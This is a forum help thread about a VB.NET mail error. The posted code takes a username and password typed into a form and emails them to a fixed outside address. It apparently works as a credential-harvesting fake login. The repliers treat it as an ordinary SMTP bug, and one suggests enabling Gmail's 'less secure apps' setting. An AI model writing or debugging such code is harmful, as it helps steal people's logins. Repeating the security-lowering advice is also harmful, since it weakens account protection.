Post your code so we can take a look at it.

This.
We can't really help without seeing the code so that we're able to figure out what caused the error.

Post the snippet of code that is throwing the error. Make sure to exclude credentials too. Lol.

End Sub

Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Username is Missing")
If TextBox2.Text = "" Then
MsgBox("Password Is Missing")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim Mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("[email protected]", "MyPass")
'using mail.com
smtpServer.Port = 587
smtpServer.Host = "smtp.mail.com"
smtpServer.EnableSsl = True
Mail = New MailMessage()
Mail.From = New MailAddress("[email protected]")
Mail.To.Add("[email protected]")
Mail.Subject = "Password :" & TextBox1.Text
Mail.Body = "Password : " & TextBox1.Text & "," & "Username : " & TextBox2.Text
smtpServer.Send(Mail)
End Sub
End Class
Gmail by default blocks that kind of requests. You should change the securty settings in your GMail account. Login to the account and navigate here. Turn the Access for less secure apps on.

If you'd like to read more about that, check this out (Google documentation). I hope that helps.

Best regards

"System.Net.Mail.SmtpException" is thrown when the application fails to complete a send email operation.
Your code seems to look fine.
Is there additional security on the mail.com email address that you're using?
